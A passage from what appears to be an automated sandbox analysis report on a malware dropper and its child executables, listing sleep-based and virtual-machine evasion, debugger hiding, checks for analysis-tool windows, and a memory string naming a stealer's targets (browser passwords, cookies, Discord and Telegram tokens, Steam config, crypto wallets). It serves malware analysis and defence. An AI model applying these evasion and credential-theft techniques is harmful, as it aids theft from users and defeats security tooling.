                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 7372Thread sleep time: -2577288s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe TID: 5820Thread sleep time: -33920s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe TID: 6464Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 2344Thread sleep count: 1177 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 2344Thread sleep time: -2355177s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 5596Thread sleep count: 1183 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 5596Thread sleep time: -2367183s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 2664Thread sleep count: 986 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 2664Thread sleep time: -1972986s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 3228Thread sleep count: 313 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 3228Thread sleep time: -1878000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 5004Thread sleep count: 1150 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 5004Thread sleep time: -2301150s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe TID: 7976Thread sleep count: 1295 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe TID: 7976Thread sleep time: -2591295s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe TID: 7972Thread sleep count: 1283 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe TID: 7972Thread sleep time: -2567283s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe TID: 7984Thread sleep count: 1144 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe TID: 7984Thread sleep time: -2289144s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe TID: 2324Thread sleep time: -36000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe TID: 7980Thread sleep count: 1044 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe TID: 7980Thread sleep time: -2089044s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe TID: 3608Thread sleep count: 1232 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe TID: 3608Thread sleep time: -2465232s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe TID: 7472Thread sleep count: 1201 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe TID: 7472Thread sleep time: -2403201s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe TID: 6212Thread sleep count: 1130 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe TID: 6212Thread sleep time: -2261130s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe TID: 3960Thread sleep count: 2184 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 5124Thread sleep time: -44022s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 2588Thread sleep time: -32016s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 5144Thread sleep count: 130 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 5144Thread sleep time: -780000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 4348Thread sleep time: -30015s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe TID: 1748Thread sleep time: -34017s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe TID: 5532Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe TID: 7704Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe TID: 7220Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeThread sleep count: Count: 3392 delay: -10
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeThread sleep count: Count: 2184 delay: -10
                          Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_0040DE0C FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,7_2_0040DE0C
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00401825 FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,7_2_00401825
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_0040CCF2 FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,FindNextFileA,FindClose,7_2_0040CCF2
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_0040B942 FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,DeleteFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,FindNextFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,7_2_0040B942
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_0040D820 FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,7_2_0040D820
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B192FC GetProcessHeap,FindFirstFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,7_2_00B192FC
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B1AE0D SHGetFolderPathA,wsprintfA,FindFirstFileA,strcmp,strcmp,_mbscpy,_splitpath,_mbscpy,strlen,isupper,wsprintfA,_mbscpy,strlen,SHFileOperation,FindClose,7_2_00B1AE0D
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B1986A FindFirstFileA,StrCmpCA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,7_2_00B1986A
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B18952 FindFirstFileA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,7_2_00B18952
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B142CC GetSystemInfo,7_2_00B142CC
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: skotes.exe, skotes.exe, 00000002.00000000.1735133031.0000000000284000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000001.1735972115.0000000000285000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1797589743.0000000000285000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000001.2211032304.0000000000285000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000000.2210039577.0000000000284000.00000080.00000001.01000000.00000007.sdmp, b6866cbf49.exe, 0000001B.00000002.3278522622.0000000000AD1000.00000040.00000001.01000000.00000013.sdmp, fa1ce2a324.exe, 0000001D.00000002.2925296404.0000000000CF6000.00000040.00000001.01000000.00000014.sdmp, b6866cbf49.exe, 00000021.00000002.3472648349.0000000000AD1000.00000040.00000001.01000000.00000013.sdmp, 09be480dc7.exe, 00000024.00000002.4170350259.00000000009A5000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                          Source: 4508a44a11.exe, 00000007.00000003.2330717903.0000000002310000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 12.1e411cf62bcba04d74fc6b505b9235404INSERT_KEY_HEREGetProcALoadLibrlstrcatAOpenEvenCreateEvCloseHanVirtualAllocExNuVirtualFGetSysteVirtualAHeapAlloGetComputerNameAlstrcpyAGetProceGetCurrentProceslstrlenAExitProcSystemTimeToFileadvapi32gdi32.dluser32.dcrypt32.ntdll.dlGetUserNCreateDCGetDevicReleaseDVMwareVMJohnDoe%hu/%hu/GetEnvironmentVariableAGetFileAttributeGlobalLoHeapFreeGetFileSGlobalSiIsWow64PProcess3GetLocalFreeLibrGetTimeZoneInforGetSystemPowerStGetWindowsDirectGetModuleFileNamDeleteFiFindNextLocalFreFindClosSetEnvironmentVaLocalAllReadFileSetFilePWriteFilCreateFiFindFirsCopyFileVirtualPGetLastElstrcpynMultiByteToWideCGlobalFrWideCharToMultiBGlobalAlOpenProcTerminateProcessgdiplus.ole32.dlbcrypt.dwininet.shlwapi.shell32.psapi.dlrstrtmgrCreateCompatibleSelectObDeleteObGdiplusSGdiplusShutdownGdipSaveImageToSGdipDisposeImageGdipFreeGetHGlobalFromStCreateStreamOnHGCoUninitCoInitiaCoCreateInstanceBCryptDeBCryptSetPropertBCryptDestroyKeyGetWindoGetDesktopWindowCloseWinwsprintfEnumDisplayDevicGetKeyboardLayouCharToOeRegQueryValueExARegEnumKRegOpenKRegCloseRegEnumVCryptBinaryToStrSHGetFolderPathAShellExecuteExAInternetOpenUrlAInternetConnectAInternetCloseHanInternetHttpSendRequestAHttpOpenRequestAInternetReadFileInternetCrackUrlStrCmpCAStrStrAStrCmpCWPathMatcRmStartSRmRegisterResourRmGetLisRmEndSessqlite3_sqlite3_prepare_sqlite3_column_tsqlite3_finalizesqlite3_column_bencrypteNSS_InitNSS_ShutPK11_GetInternalKeySlotPK11_FrePK11_AuthenticatPK11SDR_DecryptC:\ProgramData\profile:Login: PasswordOperaGXNetworkCookiesAutofillHistoryMonth: Login DaWeb Datalogins.jformSubmusernameencryptedUsernamencryptedPassworcookies.places.sPluginsSync Extension SettingsIndexedDOpera StOpera GX StableCURRENTchrome-extension_0.indexeddb.levLocal StprofilesfirefoxWallets%08lX%04ProductN%d/%d/%d %d:%d:%DisplayNDisplayVfreebl3.mozglue.msvcp140nss3.dllsoftokn3vcruntime140.dll/c start%DESKTOP%APPDATA%LOCALAP%USERPRO%DOCUMEN%PROGRAM%PROGRAMFILES_86%RECENT%\discord\Local Storage\l\Telegram Desktokey_dataD877F783D5D3EF8CA7FDF864FBC10B77A92DAA6EA6F891F2F8806DD0C461824FTelegram\.purpleaccountsdQw4w9Wgtoken: Software\Valve\SSteamPat\config\config.vDialogConfig.vdflibraryfolders.vloginuse\Steam\sqlite3.browsers\Discord\tokens.HTTP/1.1file_nammessagescreensh
                          Source: 955e8e90f4.exe, 00000009.00000003.2573558357.0000000001201000.00000004.00000020.00020000.00000000.sdmp, 955e8e90f4.exe, 00000009.00000003.2577004714.000000000123D000.00000004.00000020.00020000.00000000.sdmp, 955e8e90f4.exe, 00000009.00000003.2574472578.000000000123C000.00000004.00000020.00020000.00000000.sdmp, 955e8e90f4.exe, 00000009.00000003.2573340937.00000000011FC000.00000004.00000020.00020000.00000000.sdmp, 955e8e90f4.exe, 00000009.00000002.2602724971.000000000123D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupHyper-V RAWBt
                          Source: firefox.exe, 0000001A.00000002.2790854102.0000021311C00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWfcl
                          Source: b6866cbf49.exe, 0000001B.00000002.3361370625.000000000BCE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: 4508a44a11.exe, 00000007.00000003.2330717903.0000000002310000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVM
                          Source: firefox.exe, 0000001E.00000002.2737263058.0000028B8DE8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                          Source: b6866cbf49.exe, 00000021.00000002.3493654700.000000000111B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: 4508a44a11.exe, 00000007.00000002.3456117135.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000002.3456117135.000000000071F000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3538983714.000000000118E000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3363688901.000000000118E000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000002.3716921801.000000000118E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2819442098.000001C7A2EAA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2819442098.000001C7A2EA0000.00000004.00000020.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001410000.00000004.00000020.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3298144707.00000000013E4000.00000004.00000020.00020000.00000000.sdmp, 955e8e90f4.exe, 0000001C.00000003.3883388858.00000000014AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: b6866cbf49.exe, 0000001B.00000002.3361370625.000000000BCE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: 4508a44a11.exeBinary or memory string: MwareVMware
                          Source: firefox.exe, 00000018.00000002.2908490881.000001C7ACEB6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785158928.0000021311B1A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
                          Source: 4508a44a11.exe, 00000007.00000002.3456117135.000000000071F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                          Source: 4508a44a11.exe, 00000007.00000002.3456117135.000000000071F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: 6f9ea40b81.exe, 00000008.00000002.3716230920.000000000113E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0w
                          Source: b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001410000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP7
                          Source: file.exe, 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000001.1733956999.0000000000285000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000001.00000002.1797181871.0000000000285000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000001.1735972115.0000000000285000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1797589743.0000000000285000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000001.2211032304.0000000000285000.00000080.00000001.01000000.00000007.sdmp, b6866cbf49.exe, 0000001B.00000002.3278522622.0000000000AD1000.00000040.00000001.01000000.00000013.sdmp, fa1ce2a324.exe, 0000001D.00000002.2925296404.0000000000CF6000.00000040.00000001.01000000.00000014.sdmp, b6866cbf49.exe, 00000021.00000002.3472648349.0000000000AD1000.00000040.00000001.01000000.00000013.sdmp, 09be480dc7.exe, 00000024.00000002.4170350259.00000000009A5000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: firefox.exe, 0000001A.00000002.2740173769.000002131163A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                          Source: file.exe, 00000000.00000000.1703642472.0000000001124000.00000080.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000000.1733448886.0000000000284000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000000.1735133031.0000000000284000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000000.2210039577.0000000000284000.00000080.00000001.01000000.00000007.sdmpBinary or memory string: 4g\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: firefox.exe, 0000001A.00000002.2790854102.0000021311C00000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782855602.0000028B8E5C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeAPI call chain: ExitProcess graph end nodegraph_7-14715
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeAPI call chain: ExitProcess graph end nodegraph_7-14963
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeAPI call chain: ExitProcess graph end nodegraph_7-15136
                          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Hides threads from debuggers
                          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeThread information set: HideFromDebugger
                          Potentially malicious time measurement code found
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05070B43 Start: 05070C1B End: 05070B5F0_2_05070B43
                          Tries to detect sandboxes and other dynamic analysis tools (window names)
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeOpen window title or class name: regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeOpen window title or class name: gbdyllo
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeOpen window title or class name: procmon_window_class
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeOpen window title or class name: ollydbg
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeOpen window title or class name: filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeFile opened: NTICE
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeFile opened: SICE
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeFile opened: SIWVID
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeSystem information queried: KernelDebuggerInformation
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exeProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0507050F rdtsc 0_2_0507050F
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_0043B480 LdrInitializeThunk,8_2_0043B480
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B1C858 